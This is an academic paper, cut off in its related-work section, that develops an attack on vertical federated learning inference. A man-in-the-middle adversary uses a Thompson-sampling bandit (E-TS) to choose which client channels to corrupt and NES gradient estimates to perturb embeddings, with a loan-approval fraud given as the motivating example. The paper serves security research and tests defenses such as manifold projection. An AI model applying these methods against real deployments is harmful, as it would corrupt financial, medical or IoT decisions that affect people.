IEEE, 108(4):485–532, 2020. Gabriele Fanelli, Matthias Dantone, Juergen Gall, Andrea Fossati, and Luc Van Gool. Random forests for real time 3d face analysis. International journal of computer vision, 101:437–458, 2013.
m52uU0dVbH
How does the proposed E-TS algorithm work compared to sequential arm elimination proposed in S. Shahrampour, M. Noshad and V. Tarokh. On Sequential Elimination Algorithms for Best-Arm Identification in Multi-Armed Bandits. IEEE Transactions on Signal Processing, vol. 65, no. 16, pp. 4281-4292, 15 Aug.15, 2017
CONSTRUCTING ADVERSARIAL EXAMPLES FOR VERTICAL FEDERATED LEARNING: OPTIMAL CLIENT CORRUPTION THROUGH MULTI-ARMED BANDIT Duanyi, Yao HKUST [email protected] Songze, Li Southeast University [email protected] Ye, Xue Shenzhen Research Institute of Big Data, CUHK(SZ) [email protected] Jin, Liu HKUST(GZ) [email protected] ABSTRACT Vertical federated learning (VFL), where each participating client holds a subset of data features, has found numerous applications in finance, healthcare, and IoT systems. However, adversarial attacks, particularly through the injection of adversarial examples (AEs), pose serious challenges to the security of VFL models. In this paper, we investigate such vulnerabilities through developing a novel attack to disrupt the VFL inference process, under a practical scenario where the adversary is able to adaptively corrupt a subset of clients. We formulate the problem of finding optimal attack strategies as an online optimization problem, which is decomposed into an inner problem of adversarial example generation (AEG) and an outer problem of corruption pattern selection (CPS). Specifically, we establish the equivalence between the formulated CPS problem and a multi-armed bandit (MAB) problem, and propose the Thompson sampling with Empirical maximum reward (E-TS) algorithm for the adversary to efficiently identify the optimal subset of clients for corruption. The key idea of E-TS is to introduce an estimation of the expected maximum reward for each arm, which helps to specify a small set of competitive arms, on which the exploration for the optimal arm is performed. This significantly reduces the exploration space, which otherwise can quickly become prohibitively large as the number of clients increases. We analytically characterize the regret bound of E-TS, and empirically demonstrate its capability of efficiently revealing the optimal corruption pattern with the highest attack success rate, under various datasets of popular VFL tasks. 1 INTRODUCTION Federated learning (FL) [Li et al., 2020] is a distributed learning paradigm that enables multiple clients to collaboratively train and utilize a machine learning model without sharing their data. Conventionally, most FL research considers the Horizontal FL (HFL) setting, where clients hold different data samples with the same feature space. In contrast, vertical FL (VFL) tackles the scenarios where clients have identical samples but disjoint feature spaces. A typical VFL model comprises a top model maintained by a server and multiple bottom models, one at each participating client. During the inference process, each client computes the local embedding of data features using its bottom model and uploads it to the server through a communication channel for further prediction. Due to its advantage of incorporating attributes from diverse information sources, VFL has found promising applications in healthcare systems [Poirot et al., 2019], e-commerce platforms [Mammen, 2021], and financial systems [Liu et al., 2022]. VFL inference has also been applied to the Internet of Things (IoT) scenarios (also known as collaborative inference [Liu et al., Ko et al., 2018]), where sensor data with distinct features are aggregated by a fusion center for further processing. A recent example is to utilize multi-modal image data from sensors for remote sensing image classification [Shi et al., 2022]. Despite its widespread applications, ML models have been shown vulnerable to adversarial examples (AEs) [Goodfellow et al., 2014], which are modified inputs designed to cause model misclassification during the inference. Constructing AEs in the VFL setting presents unique challenges compared to the conventional ML setting. Specifically, we consider a third-party adversary who can access, replay, and manipulate messages on the communication channel between a client and the server. (For simplicity, we use client $x$ to denote the communication channel between client $x$ and the server throughout the paper). However, it can only corrupt a subset of clients due to resource constraints, like computational and network bandwidth [Lesi et al., 2020; Li and Tang, 2018; Wu et al., 2018]. Also, the server’s top model and the other uncorrupted clients’ embeddings and models are unknown to the adversary. Under this setting, the adversary aims to generate AEs by adding manipulated perturbations to embeddings in the corrupted clients, such that the attack success rate (ASR) over a sequence of test samples is maximized. Prior works have proposed methods to generate AEs for VFL inference, for a fixed corruption pattern (i.e., the set of corrupted clients remains fixed throughout the attack). In [Pang et al., 2022], a finite difference method was proposed to generate adversarial dominating inputs, by perturbing the features of a fixed corrupted client, to control the inference result, regardless of the feature values of other clients; another work [Qiu et al., 2022] employed zeroth-order optimization (ZOO) to find the optimal perturbation on the uploaded embedding of a malicious client. Meanwhile, these attacks also make assumptions on certain prior knowledge at the adversary, e.g., the adversary can obtain a subset of complete test samples in advance. In this paper, we consider an adversary who lacks prior knowledge on test data or VFL models, but can adaptively adjust its corruption pattern based on the effectiveness of the previous attacks, subject to a maximum number of clients that can be corrupted. For a VFL inference process of $T$ rounds, we formulate the attack as an online optimization problem, over $T$ corruption patterns, one for each inference round, and the embedding perturbations for the test samples in each round. To solve the problem, we first decompose it into two sub-problems: the inner adversarial examples generation (AEG) problem and the outer corruption pattern selection (CPS) problem. For the AEG problem with a fixed corruption pattern, we apply the natural evolution strategy (NES) to estimate the gradient for perturbation optimization. For the outer CPS problem, we establish its equivalence with arm selection in a multi-armed bandit (MAB) problem, with the reward being the optimal ASR obtained from the AEG problem. Given the unique challenge that the total number of arms scale combinatorially with the number of clients, we propose a novel method named Thompson sampling with empirical maximum reward (E-TS), enabling the adversary to efficiently identify the optimal corruption pattern. The key idea is to limit the exploration within the competitive set, which is defined using the expected maximum reward of each arm. Compared with plain Thompson sampling (TS) for the MAB problem [Agrawal and Goyal, 2012], E-TS additionally maintains the empirical maximum reward for each arm, which are utilized to estimate the underlying competitive arms, within which TS is executed to select the corruption pattern. We theoretically characterize a regret bound of $(N - D)O(1) + DO(\log(T))$ for the proposed E-TS algorithm, where $N$ is the number of arms and $D$ is the number of competitive arms. This demonstrates the advantage of E-TS over the plain TS, especially for a small number of competitive arms. We also empirically evaluate the performance of the proposed attack on datasets with four major types of VFL tasks. In all experiments, the proposed attack uniformly dominates all baselines with fastest convergence to the optimal corruption pattern with the highest ASR. For the proposed attack, we further conduct extensive experiments to evaluate its effectiveness under various combinations of system parameters and the design parameter, and common defense strategies against AEs. ## 2 Preliminaries **VFL inference.** A VFL system consists of a central server and $M$ clients. Each client $m \in [M]$ possesses a subset of disjoint features $x_m$ and a corresponding bottom model $f_m$, where $[M]$ denotes the set $\{1, \ldots, M\}$. The central server maintains a top model $f_0$. Given a test sample $X = [x_1, \ldots, x_M]$, VFL inference is carried out in two stages. First, each client $m$ computes a local embedding $h_m = f_m(x_m)$ using its bottom model, and uploads it to the server through a communication channel for querying a label. In the second stage, the server aggregates the embeddings from all clients and computes the predicted result $p = f_0([h_1, \ldots, h_M]) \in \mathbb{R}^c$, which is a probability vector over $c$ classes. The server broadcasts $p$ to all the clients, who then obtain the predicted label $\hat{y}(p)$, where $\hat{y}(\cdot)$ returns the class with the highest probability. To enhance robustness... against system impairments, such as dropouts in embedding transmission, the system permits repeated queries for the same test sample, with a maximum limit of $Q$ times. The inference process operates in an online mode, such that test samples are received continuously in a streaming fashion. **Multi-armed bandit.** A multi-armed bandit (MAB) problem consists of $N$ arms. Each arm $k \in [N]$ corresponds to a random reward following an unknown distribution with mean $\mu_k$. The bandit is played for $T$ rounds. In each round $t \in [T]$, one of the $N$ arms, denoted by $k(t)$, is pulled. The pulled arm yields a random reward $r_{k(t)}(t)$ supported in the range $[0, 1]$, which is i.i.d. from repeated plays of the same arm and observed by the player. The player must decide which arm to pull at each round $t$, i.e., $k(t)$, based on the rewards in previous rounds, to maximize the expected cumulative reward at round $T$, expressed as $\mathbb{E}[\sum_{t=1}^{T} \mu_{k(t)}]$, where $\mu_{k(t)} = \mathbb{E}[r_{k(t)}(t)]$. Assuming there exists an optimal arm with the highest mean reward $\mu^*$, the problem is equivalent to minimizing the expected regret $\mathbb{E}[R(T)]$, which is defined as follows: $$\mathbb{E}[R(T)] = \mathbb{E}\left[\sum_{t=1}^{T} (\mu^* - \mu_{k(t)})\right] = \mathbb{E}\left[\sum_{k=1}^{N} n_k(T) \Delta_k\right],$$ where $n_k(T)$ denotes the number of times pulling arm $k$ in $T$ rounds, and $\Delta_k = \mu^* - \mu_k$ denotes the mean reward gap between the optimal arm and arm $k$. ### 3 Threat Model **Goal of the adversary.** We consider two types of attacks: targeted attack and untargeted attack. For the targeted attack with some target label $y_v$, the adversary aims to corrupt the samples whose original prediction is not $y_v$, making the top model output $\hat{y} = y_v$. For instance in a lending application, the adversary might set $y_v$ to “lending” to secure a loan to an unqualified customer. For the untargeted attack with some label $y_u$, the adversary would like to corrupt the samples whose original prediction is $y_u$, making the top model output $\hat{y} \neq y_u$. Note that the conventional untargeted attack [Mahmood et al., 2021] is a special case of the one considered here, when setting $y_u$ as the true label of the attacked samples. **Metric.** The attack’s effectiveness is measured by *attack success rate* (ASR), which is defined as $ASR_v^s = \frac{\sum_{i=1}^{s} \mathbb{I}(\hat{y}(p_i) = y_v)}{s}$ and $ASR_u^s = \frac{\sum_{i=1}^{s} \mathbb{I}(\hat{y}(p_i) \neq y_u)}{s}$ for targeted and untargeted attack, respectively, where $s$ is the number of samples to be attacked, $p_i$ is the probability vector of test sample $i$, and $\mathbb{I}(\cdot)$ is the indicator function. **Capability of the adversary.** We consider an adversary as a third party in VFL inference, who can access, replay, and manipulate messages on the communication channel between two endpoints. This scenario stems from a man-in-the-middle (MITM) attack [Conti et al., 2016; Wang et al., 2020], e.g., Mallory can open letters sent from Bob to Alice and change or resend their contents before handing over the letter to Alice. In VFL inference, a communication channel is established between each client and the server, through which embeddings and predictions are exchanged. The adversary can choose to corrupt any specific channel, e.g., client 1 (for simplicity, we use client $x$ to denote the communication channel between client $x$ and the server). However, due to resource constraints like computational power and network bandwidth (see, e.g., Lesi et al., 2020; Wang et al., 2016; Wu et al., 2018), the adversary can corrupt at most $C \leq M$ clients. Formally, for a test sample $i$, the adversary can perturb the embeddings of up to $C$ clients, denoted as $h_{i,a}$ with $|h_{i,a}| \leq C$, to obtain $\tilde{h}_{i,a}$ such that $\|\tilde{h}_{i,a} - h_{i,a}\|_\infty \leq \beta(ub_i - lb_i)$, where $ub_i$ and $lb_i$ represent the maximum and minimum values of the elements in $h_{i,a}$ respectively, and $\beta \in [0, 1]$ is the perturbation budget of some simple magnitude-based anomaly detector. **Adaptive corruption.** In the context of online inference, we focus on a class of powerful adversaries capable of adaptively adjusting their corruption patterns. In each attack round, the adversary perturbs the embeddings in the corrupted clients for a batch of test samples. In subsequent attack rounds, the sets of corrupted clients can be adjusted subject to the constraint $C$, exploiting feedbacks on attack performance from previous rounds. ### 4 Problem Definition The attack proceeds in $T$ rounds. In each attack round $t \in [T]$, the adversary seeks to perturb a batch of $B_t$ test samples following a corruption pattern $C_t = \{a_1, \ldots, a_C\}$, where $a_j, j \in [C]$, denotes the index of the corrupted client. More precisely, given the embeddings of a test sample \( i \in [B^t] \), denoted as \( h_i^t = [h_{i,1}^t, \ldots, h_{i,M}^t] \), where \( h_{i,m}^t, m \in [M] \), represents the embedding vector of client \( m \), we partition \( h_i^t \) into the adversarial part \( h_{i,a}^t = [h_{i,a_1}^t, \ldots, h_{i,a_C}^t] \), and the benign part \( h_{i,b}^t \), according to \( C^t \). The adversary crafts a perturbation \( \eta_i^t = [\eta_{i,a_1}^t, \ldots, \eta_{i,a_C}^t] \) with \( \| \eta_i^t \|_\infty \leq \beta (ub_i - lb_i) \), and adds it to \( h_{i,a}^t \) to obtain an adversarial embedding \( \tilde{h}_{i,a}^t = h_{i,a}^t + \eta_i^t \), before submitting it to the server. Upon receiving \( \tilde{h}_{i,a}^t \) and \( h_{i,b}^t \), the server returns the prediction \( f_0(\tilde{h}_{i,a}^t; h_{i,b}^t) \) to all clients. After collecting all predictions of \( B^t \) adversarial embeddings, the adversary computes the ASR, i.e., \[ A(\{\eta_i^t\}_{i=1}^{B^t}, C^t; B^t) = \frac{\sum_{i=1}^{B^t} \mathbb{I}(y(f_0(\tilde{h}_{i,a}^t; h_{i,b}^t)) = y_v)}{B^t} \] for the targeted attack with target label \( y_v \), or \[ A(\{\eta_i^t\}_{i=1}^{B^t}, C^t; B^t) = \frac{\sum_{i=1}^{B^t} \mathbb{I}(y(f_0(\tilde{h}_{i,a}^t; h_{i,b}^t)) \neq y_u)}{B^t} \] for the untargeted attack with label \( y_u \). The adversary aims to find the optimal set of corruption patterns \( \{C^t\}_{t=1}^T \), and the optimal set of perturbations \( \{\eta_i^t\}_{i=1}^{B^t} \) for each sample \( i \in [B^t] \) in attack round \( t \in [T] \), thus maximizing the expected cumulative ASR over \( T \) attack rounds. We formulate this attack as an online optimization problem in (2). Note that the expectation \( \mathbb{E}_t \) is taken over the randomness with the \( t \)-th attack round and the expectation \( \mathbb{E} \) is taking over the randomness of all \( T \) rounds. \[ \max_{\{C^t\}_{t=1}^T} \frac{\mathbb{E}\left[\sum_{t=1}^{T} \mathbb{E}_t \left[ \max_{\{\eta_i^t\}_{i=1}^{B^t}} A(\{\eta_i^t\}_{i=1}^{B^t}, C^t; B^t) \right] \right]}{\sum_{t=1}^{T} B^t} \] subject to \( |C^t| = C \), \( \| \eta_i^t \|_\infty \leq \beta (ub_i - lb_i) \), \( \forall t \in [T] \). 5 METHODOLOGY To solve Problem (2), we decompose the above problem into an inner problem of adversarial example generation (AEG) and an outer problem of corruption pattern selection (CPS). We first specify the inner problem of AEG. At each round \( t, t \in [T] \), with a fixed corruption pattern \( C^t \), for each test sample \( i \in [B^t] \), the adversary intends to find the optimal perturbation \( \eta_i^t \) that minimizes some loss function, as shown in (3). We consider the loss function \( L(\eta_i^t; C^t) = l(f_0(h_{i,a}^t; h_{i,b}^t), y_v) \) for the targeted attack with target label \( y_v \), and \( L(\eta_i^t; C^t) = -l(f_0(h_{i,a}^t; h_{i,b}^t), y_u) \) for the untargeted attack with label \( y_u \), where \( l(\cdot) \) denotes the loss metric, such as cross-entropy or margin loss. Inner problem (AEG): \[ \min_{\eta_i^t} L(\eta_i^t; C^t), \quad \text{s.t. } \| \eta_i^t \|_\infty \leq \beta (ub_i - lb_i), \forall i \in [B^t]. \] (3) Then, we obtain the ASR of \( B^t \) test samples, i.e., \( A^*(C^t; B^t) = A(\{\eta_i^t\}_{i=1}^{B^t}, C^t; B^t) \), obtained using optimal perturbations \( \eta_i^{t*}, i \in [B^t] \), from solving the problem AEG. As such, the outer problem of CPS can be cast into Outer problem (CPS): \[ \min_{\{C^t\}_{t=1}^T} \frac{\mathbb{E}\left[\sum_{t=1}^{T} (\alpha^* - \mathbb{E}_t [A^*(C^t; B^t)]) \right]}{\sum_{t=1}^{T} B^t} \] subject to \( |C^t| = C \), \( \forall t \in [T] \), where \( \alpha^* \) is any positive constant. The inherent randomness of \( A^*(C^t; B^t) \) for a fixed \( C^t \) arises from the random test samples and the random noises in the AE generation process. 5.1 AE generation by solving the AEG problem To address the box-constraint inner AEG problem (3), one might initially consider employing the projected gradient descent (PGD) method Madry et al. (2017). However, in our setting, the adversary can only access the value of the loss function and cannot directly obtain the gradient, thus necessitating the use of ZOO methods. The ZOO method iteratively seeks for the optimal variable. Each iteration typically commences with an estimation of the current variable’s gradient, followed by a gradient descent-based variable update. NES Ilyas et al. (2018), a type of ZOO method, not only estimates the gradient but also requires fewer queries than conventional finite-difference methods. NES is thus Algorithm 1 E-TS for CPS 1: **Initialization**: \( \forall k \in [N], \hat{\mu}_k = 0, \hat{\sigma}_k = 1, n_k = 0, r_{k}^{\text{max}} = 0, \hat{\phi}_k = 0. \) 2: **for** \( t = 1, 2, \ldots, T \) **do** 3: **if** \( t > t_0 \) **then** 4: Select fully explored arms to construct the set \( S_t = \{ k \in [N] : n_k \geq \frac{(t-1)}{N} \}. \) 5: Select the empirical best arm \( k^{\text{emp}}(t) = \max_{k \in S_t} \hat{\mu}_k. \) 6: Initialize \( E^t = \emptyset \), add arms \( k \in [N] \) which satisfy \( \hat{\phi}_k \geq \hat{\mu}_{k^{\text{emp}}(t)} \) to \( E^t \). 7: **else** 8: Initialize set \( E^t = [N]. \) 9: **end if** 10: \( \forall k \in E^t \): Sample \( \theta_k \sim N(\hat{\mu}_k, \hat{\sigma}_k). \) 11: Choose the arm \( k(t) = \arg\max_k \theta_k \) and decide the corruption pattern \( C^t = k(t). \) 12: Sample batch data \( B^t \), play the arm \( k(t) \) as the corruption pattern in Algorithm 2, and observe the reward \( r_{k(t)}(t) \) from the attack result for the corrupted embedding \( h_{i,a}^t = [h_{i,a_1}^t, \ldots, h_{i,a_C}^t], \forall i \in [B^t]. \) 13: Update \( n_k(t) = n_k(t) + 1, \hat{\mu}_k(t) = \frac{\hat{\mu}_k(t)(n_k(t)-1)+r_{k(t)}(t)}{n_k(t)}, \hat{\sigma}_k(t) = \frac{1}{n_k(t)+1}, r_{k}^{\text{max}}(t) = \max\{r_{k}^{\text{max}}, r_{k(t)}(t)\}, \hat{\phi}_k(t) = \frac{\hat{\phi}_k(t)(n_k(t)-1)+r_{k(t)}(t)}{n_k(t)}. \) 14: **end for** 15: Output \( \{k(1), \ldots, k(T)\} \) especially well-suited for addressing the AEG problem (3) in the VFL setting, where query times are inherently limited. In the process of AE generation using NES, the adversary samples \( n \) Gaussian noises \( \delta_j \sim N(0, I), j \in [n], \) and adds them to the current variable \( \eta_i^t, \) with some scaling parameter \( \sigma > 0. \) Then, the gradient estimation is given by \[ \nabla_{\eta_i^t} L(\eta_i^t; C^t) \approx \frac{1}{\sigma n} \sum_{j=1}^{n} \delta_j L(\eta_i^t + \sigma \delta_j; C^t). \] After obtaining the gradient estimates, the adversary can update \( \eta_i^t \) in a PGD manner. The details of the AE generation process are provided in Algorithm 2 in Appendix A. Note that the number of queries on each test sample is limited to \( Q, \) therefore, the adversary can update the drafted perturbation at most \( \lfloor \frac{Q}{n} \rfloor \) times for each sample. 5.2 Thompson sampling with the empirical maximum reward for solving the CPS problem To solve the CPS problem, we make a key observation that the outer problem in (4) can be cast as an MAB problem. Specifically, picking \( C \) out of total \( M \) clients to corrupt results in \( N = \binom{M}{C} \) possible corruption patterns, which are defined as \( N \) arms in the MAB problem. That is to say, there is a bijection between the set of \( N \) arms and the optimization space of \( C^t. \) Therefore, we can transform optimization variables \( \{C^t\}_{t=1}^{T} \) into the selected arms at \( t \) round, i.e., \( \{k(t)\}_{t=1}^{T}. \) At round \( t, \) pulling an arm \( k(t) \) returns the reward \( r_{k(t)}(t) \) as the ASR, i.e., \( r_{k(t)}(t) = A^*(C^t; B^t) \in [0, 1]. \) We define the mean of the reward for arm \( k(t) \) as \( \mathbb{E}[r_{k(t)}(t)] = \mu_{k(t)} = \mathbb{E}[A^*(C^t; B^t)]. \) Without loss of generality, we assign the best arm the arm 1 with fixed positive mean \( \mu_1 > 0, \) which can be considered as the positive value \( \alpha^* \) in (4). Finally, the CPS problem in (4) is transformed into an MAB problem, i.e., \( \min_{\{k(t)\}_{t=1}^{T}} \mathbb{E}\left[ \sum_{t=1}^{T} (\mu_1 - \mu_{k(t)}) \right]. \) **E-TS algorithm.** In our context, the adversary could face a significant challenge as the exploration space \( N \) can become prohibitively large when engaging with hundreds of clients, which could result in a steep accumulation of regret. To mitigate the issue from extensive exploration, we first introduce the following definition of the competitive arm. **Definition 1 (Competitive arm).** An arm \( k \) is described as a competitive arm when the expected maximum reward is larger than the best arm’s mean, i.e., \( \tilde{\Delta}_{k,1} = \frac{\sum_{t=1}^{T} \mathbb{E}[r_{k}^{\text{max}}(t)]}{T} - \mu_1 \geq 0, \) where \( r_{k}^{\text{max}}(t) = \max_{\tau \in [t]} \{r_{k}(\tau)\}. \) Otherwise, it is a non-competitive arm. Based on the above definition, we propose Thompson sampling with Empirical maximum reward (E-TS) algorithm. The basic idea of E-TS is to restrict the exploration space within the set of competitive arms to reduce accumulated regret. However, the ground-truth competitive arms cannot be accessed a priori. Therefore, we propose to construct an empirical competitive set $\mathcal{E}^t$ with estimated competitive arms at each round $t$ and restrict exploration within it. Estimating the competitive arms requires calculating the empirical best arm and empirical maximum reward defined as follows. **Definition 2 (Empirical best arm and empirical maximum reward).** An arm $k$ is selected as the empirical best arm $k_{emp}(t)$ at round $t$, when $k = \arg\max_{k \in \mathcal{S}^t} \hat{\mu}_k(t)$, where $\hat{\mu}_k(t)$ is the estimated mean of arm $k$’s reward at round $t$, $\mathcal{S}^t = \{k \in [N] : n_k(t) \geq \frac{(t-1)}{N}\}$, and $n_k(t)$ denotes the number of times pulling arm $k$ in $t$ rounds. An arm $k$’s empirical maximum reward $\hat{\varphi}_k(t)$ is computed by: $$\hat{\varphi}_k(t) := \frac{\sum_{\tau=1}^{t} r_{\max}(\tau) \mathbb{I}(k(\tau)=k)}{n_k(t)}.$$ Based on Definitions 1 and 2, we are now able to present the key components of the E-TS algorithm. E-TS consists of two steps: first, for constructing an empirical competitive set $\mathcal{E}^t$ at round $t$, E-TS estimates $\mu_1$ and $\sum_{\tau=1}^{t} \mathbb{E}[r_{\max}(\tau)]$ using the mean of empirical best arm $\hat{\mu}_{k_{emp}(t)}(t)$ and the empirical maximum reward $\hat{\varphi}_k(t)$, and obtains $\mathcal{E}^t = \{k \in [N] : \hat{\varphi}_k(t) - \hat{\mu}_{k_{emp}(t)}(t) \geq 0\}$. Second, while performing TS to explore each arm, E-TS adopts a Gaussian prior $\mathcal{N}(\hat{\mu}_k(t), \frac{1}{n_k(t)+1})$ to approximate the distribution of the reward, where $\hat{\mu}_k(t)$ is defined as $\hat{\mu}_k(t) := \frac{\sum_{\tau=1}^{t} r_k(\tau) \mathbb{I}(k(\tau)=k)}{n_k(t)}$. In addition to the above two steps, E-TS also involves $t_0$ warm-up rounds, in which it simply executes TS across all arms. These warm-up rounds are designed to facilitate a more accurate estimation of each arm’s reward mean and expected maximum reward. The complete algorithm is presented in Algorithm 1. **Remark 1.** Previous work Gupta et al. (2021) leverages the upper bound $s_{k,l}(r)$ of arm $k$’s reward conditioned on obtaining reward $r$ from pulling arm $l$ (i.e., $\mathbb{E}[r_k(t)|r_l(t)=r] \leq s_{k,l}(r)$) to reduce the exploration space, where $s_{k,l}(r)$ is a known constant. In contrast, the proposed E-TS algorithm does not require any prior information about reward upper bound, making it more practical. ### 6 REGRET ANALYSIS In this section, we analyze the regret bound for the proposed E-TS algorithm. Prior to proof, we assume that each arm is pulled at least twice during the initial warm-up rounds. This assumption aligns with our analysis on the optimal choice of warm-up rounds detailed in Appendix C.6. Achieving this assumption is highly probable as the number of warm-up rounds increases asymptotically (Agrawal and Goyal (2017)). Additionally, an adversary can traverse all arms before implementing E-TS to ensure this prerequisite is met. To facilitate discussion, we first introduce two key lemmas. Then, we present the expected regret bound of E-TS algorithm in Theorem 1. We defer all proof details of the lemmas and the theorem in Appendix B. **Lemma 1 (Expected pulling times of a non-competitive arm).** Under the above assumption, for a non-competitive arm $k^{nc} \neq 1$ with $\Delta_{k^{nc},1} < 0$, the expected number of pulling times in $T$ rounds, i.e., $\mathbb{E}[n_{k^{nc}}(T)]$, is bounded by $\mathbb{E}[n_{k^{nc}}(T)] \leq O(1)$. **Lemma 2 (Expected pulling times of a competitive but sub-optimal arm).** Under the above assumption, the expected number of times pulling a competitive but sub-optimal arm $k^{sub}$ with $\Delta_{k^{sub},1} \geq 0$ in $T$ rounds is bounded as follows, $$\mathbb{E}[n_{k^{sub}}(T)] = \sum_{t=1}^{T} \Pr(k(t) = k^{sub}, n_1(t) \geq \frac{t}{N}) \leq O(\log(T)).$$ **Theorem 1 (Upper bound on expected regret of E-TS).** Let $D \leq N$ denote the number of competitive arms. Under the above assumption, the expected regret of the E-TS algorithm is upper bounded by $DO(\log(T)) + (N-D)O(1)$. **Proof sketch.** We first demonstrate that the probability that pulling the optimal arm is infrequent (i.e., $n_1(t) < \frac{(t-1)}{N}$) is bounded. Next, we categorize the sub-optimal arms into non-competitive arms and competitive but sub-optimal arms, and analyse their regret bound respectively. For a non-competitive arm $k^{nc}$, the probability of $k(t) = k^{nc}$ is bounded by the probability of selecting as the competitive arm, i.e., $\Pr(k^{nc} \in \mathcal{E}^t)$, which is further bounded as in Lemma 1. On the other hand, for a competitive but sub-optimal arm $k^{sub}$, we further divide the analysis in two cases based on whether or not the optimal arm is included in $\mathcal{E}^t$. By combining the probability upper bounds in these two cases, we arrive at an upper bound on the probability of $k(t) = k^{sub}$ as in Lemma 2. Remark 2. In comparison with plain TS, our proposed E-TS holds a significant advantage in terms of limiting the expected number of times pulling a non-competitive arm, which is reduced from $O(\log(T))$ to $O(1)$. 7 EXPERIMENTAL EVALUATIONS 7.1 SETUP The proposed attack is implemented using the PyTorch framework [Paszke et al., 2017], and all experiments are executed on a single machine equipped with four NVIDIA RTX 3090 GPUs. Each experiment is repeated for 10 trials, and the average values and their standard deviations are reported. Datasets. We perform experiments on six datasets of distinct VFL tasks. 1) Tabular dataset: Credit [Yeh and Lien, 2009] and Real-Sim [Chang and Lin, 2011], where data features are equally partitioned across 6 and 10 clients, respectively; 2) Computer vision (CV) dataset: FashionMNIST [Xiao et al., 2017] and CIFAR-10 [Krizhevsky et al., 2009], with features equally distributed across 7 and 8 clients, respectively; 3) Multi-view dataset: Caltech-7 [Li et al., 2022], which consists of 6 views, each held by a separate client; 4) Natural language dataset: IMDB [Maas et al., 2011], where each complete movie review is partitioned among 6 clients, each possessing a subset of sentences. More details about the datasets and model structures are provided in Appendix C.1. Baselines. We consider three baseline strategies for corruption pattern selection: 1) Fixed corruption pattern, where the adversary corrupts a fixed set of clients during the inference. For comparison, we consider two fixed corruption patterns where one is the underlying optimal pattern with the highest ASR, and another is randomly selected at the beginning of the attack; 2) Random corruption (RC), where the adversary selects uniformly at random a set of $C$ clients to corrupt in each attack round; and 3) Plain Thompson sampling (TS), where the adversary executes the plain TS to improve the corruption pattern selection. Experimental parameters setting. The adversary can query the server for up to $Q = 2000$ times per test sample. The number of warm-up rounds in E-TS $t_0$ is set to 80 for FashionMNIST, CIFAR-10, and Caltech-7, 50 for Credit and Real-Sim, and 40 for IMDB. For the targeted attack, we set the target label to 7 for FashionMNIST and CIFAR-10, and 3 for Caltech-7. We measure the ASR over 30 test epochs, each comprising multiple attack rounds. In our ablation study, we adjust one parameter at a time, keeping the rest constant, with default settings of $C = 2$, $t_0 = 80$, $Q = 2000$, and $\beta = 0.3$. 7.2 RESULTS We plot the ASR of targeted and untargeted attacks for different datasets in Figure 1. Note that the targeted and untargeted attacks are equivalent for Credit, Real-Sim, and IMDB with binary labels. We observe that uniformly across all datasets, the proposed E-TS method effectively attacks VFL models with an ASR of $38\% \sim 99\%$ for targeted attack and $41\% \sim 99\%$ for untargeted attack. For each attack, we observe a significant gap in ASR between the best and sub-optimal corruption patterns, demonstrating the significance of corruption pattern selection. The RC baseline exhibits a stable, yet sub-optimal ASR performance, as it does not leverage any information from historical ASRs. In sharp contrast, the performance of both TS and E-TS converge to that of the best corruption pattern. Notably, thanks to the estimation of empirical maximum reward, the E-TS algorithm efficiently narrows down the exploration space, achieving a much faster and more stable convergence than TS. Ablation study. We evaluate the effects of system parameters, including corruption constraint $C$, query budget $Q$, and perturbation budget $\beta$, and the design parameter, the number of warm-up rounds $t_0$, on the performance of the proposed attack. Besides, we test the attack performance under a larger search space. As shown in Figure 3(a), ASR increases as more clients are corrupted, and E-TS consistently outperforms random corruption. It is illustrated in Figure 3(b) that it is critical to select the appropriate number of warm-up rounds $t_0$ at the beginning of E-TS. When $t_0$ is too small, i.e., $t_0 = 20$, it leads to an inaccurate estimate of the empirical competitive set which may exclude the best arm, causing E-TS to converge on a sub-optimal arm. However, if $t_0$ is too large, i.e., $t_0 = 200$ or 1000, the advantage over plain TS diminishes. That is, one needs to optimize $t_0$ to find the optimal arm with the fastest speed. Figure 3(c) and (d) show that ASR generally increases with larger $Q$ and $\beta$. Nevertheless, after reaching 0.3, increasing perturbation budget has negligible effect on improving ASR. Figure 4 shows that E-TS consistently outperforms baselines in larger exploration space, i.e., when there are $\binom{16}{2} = 120$, $\binom{16}{3} = 560$, $\binom{28}{2} = 378$, and $\binom{28}{3} = 3276$ choices. Notably, this performance gap between E-TS and TS becomes even more pronounced when the exploration space is expanded, demonstrating its effectiveness in handling larger exploration spaces. More experimental results of corrupting different numbers of clients on other datasets are provided in Appendix C.2. We also investigated the dynamics of arm selection and empirical competitive set in TS and E-TS (in Appendix C.3), minimum query budget and corruption channels to achieve 50% ASR (in Appendix C.4), the E-TS performance in large exploration spaces (in Appendix C.5), and the optimal choice on the warm-up round $t_0$ (in Appendix C.6). **Defenses.** We further evaluate the effectiveness of the proposed attack under the following common defense strategies. - **Randomized smoothing** (Cohen et al., 2019): The main idea is to smooth out the decision boundary of a classifier, such that it’s less sensitive to small perturbations in the input data. To construct a smooth VFL classifier, Gaussian noises are added to clients’ embeddings, which are then processed by the top model to make a prediction. The final prediction is obtained by majority voting over 100 such trials; - **Dropout** (Qiu et al., 2022): A dropout layer is added after each activation layer in the server’s top model to improve the robustness. Here, we set the dropout rate to 0.3; **Manifold projection** (Meng and Chen (2017); Lindqvist et al. (2018)): An autoencoder is incorporated into the model as a pre-processing step before the top model. During training, the autoencoder is trained using clean embeddings and designed to reconstruct the original embeddings. During inference, the clients’ embeddings are first processed using the autoencoder before being passed to the top model for prediction. As shown in Figure 2 for a targeted attack with $\beta = 0.3$, the ASR of the proposed attack reduces under all considered defenses; for an untargeted attack when $\beta = 0.1$, the ASRs experience marginal reductions under the randomized smoothing and dropout defenses, but significant drops of $35\% \sim 72\%$ in the ASR under manifold projection. The advantage of manifold projection can be attributed to the learning of the manifold structure and the transformation of adversarial embeddings into clean embeddings. Overall, while manifold projection exhibits the strongest capability in defending the proposed attack, it fails to completely eliminate all AEs. ### 8 RELATED WORK **AE generation for ML models.** AE generation methods can be generally classified into two categories: white-box and black-box settings. While the former assumes the adversary knows full knowledge of model parameters and architectures, the latter assumes no prior knowledge of either the models or training data. Our work is concerned with a black-box setting, which is typically addressed using either transfer-based or query-based solutions. Transfer-based methods (Papernot et al. (2016); Liu et al. (2016) generate AEs using a substitute model, which is trained either by querying the model’s output or using a subset of training data. Query-based methods (Bhagoji et al. (2018); Chen et al. (2017) optimize AEs utilizing gradient information, which is estimated through the queried outputs. One classical example is the ZOO attack (Chen et al. (2017), which employs zeroth-order stochastic coordinate descent for gradient estimation. **MAB algorithms.** Multiple classical algorithms, such as $\epsilon$-greedy (Sutton and Barto (2018), Upper 